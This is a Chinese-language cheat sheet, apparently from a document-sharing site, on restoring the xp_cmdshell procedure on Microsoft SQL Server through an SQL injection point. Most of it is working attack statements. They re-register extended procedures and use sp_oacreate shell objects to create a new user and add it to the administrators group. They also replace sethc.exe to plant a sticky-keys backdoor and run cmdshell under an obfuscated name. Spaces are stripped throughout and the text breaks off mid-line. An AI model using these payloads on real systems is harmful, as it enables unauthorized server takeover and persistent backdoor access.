XP_CMDSHELL恢复方法大全.docxVIP

XP_CMDSHELL恢复方法大全

1未能找到存储过程master..xpcmdshell.EXECmaster.dbo.sp_addextendedproc后用下面的三种方法,在注入点上执行加个空格和;号

恢复方法：查询分离器连接后,

第一步执行:EXECsp_addextendedprocxp_cmdshell,@dllname=xplog70.dlldeclare@oint

第二步执行:sp_addextendedprocxp_cmdshell,xpsql70.dll

然后按F5键命令执行完毕

2无法装载DLLxpsql70.dll或该DLL所引用的某一DLL。原因126（找不到指定模块。）

恢复方法：查询分离器连接后,

第一步执行：EXECmaster.dbo.sp_dropextendedprocxp_cmdshell

第二步执行：EXECmaster.dbo.sp_addextendedprocxp_cmdshell,xpsql70.dll

然后按F5键命令执行完毕

3无法在库xpweb70.dll中找到函数xp_cmdshell。原因:127(找不到指定的程序。)

恢复方法：查询分离器连接后,

第一步执行:execsp_dropextendedprocxp_cmdshell

第二步执行:execsp_addextendedprocxp_cmdshell,xpweb70.dll

然后按F5键命令执行完毕

4终极方法.

如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:

查询分离器连接后,

2000servser系统:

declare@shellintexecsp_oacreatewscript.shell,@shelloutputexecsp_oamethod@shell,run,null,c:\winnt\system32\cmd.exe/cnetuser新用户密码/add

declare@shellintexecsp_oacreatewscript.shell,@shelloutputexecsp_oamethod@shell,run,null,c:\winnt\system32\cmd.exe/cnetlocalgroupadministrators新用户/add

xp或2003server系统:

declare@shellintexecsp_oacreatewscript.shell,@shelloutputexecsp_oamethod@shell,run,null,c:\windows\system32\cmd.exe/cnetuser新用户密码/add

declare@shellintexecsp_oacreatewscript.shell,@shelloutputexecsp_oamethod@shell,run,null,c:\windows\system32\cmd.exe/cnetlocalgroupadministrators新用户/add

五个SHIFT

declare@ointexecsp_oacreatescripting.filesystemobject,@ooutexecsp_oamethod@o,copyfile,null,c:\windows\explorer.exe,c:\windows\system32\sethc.exe;

declare@oointexecsp_oacreatescripting.filesystemobject,@oooutexecsp_oamethod@oo,copyfile,null,c:\windows\system32\sethc.exe,c:\windows\system32\dllcache\sethc.exe;

xp_cmdshell执行命令另一种方法

declare@asysnameset@a=xp_+cmdshellexec@anetuserrefdom123456/add

判断存储扩展是否存在

Selectcount(*)frommaster.dbo.sysobjectswherextype=Xandname=xp_cmdshell

返回结果为1就OK

上传xplog70.dll恢复xp_cmdshell语句:

sp_addextendedprocxp_cmdshell,@dllname=E:\newche2\about\XPLOG70.D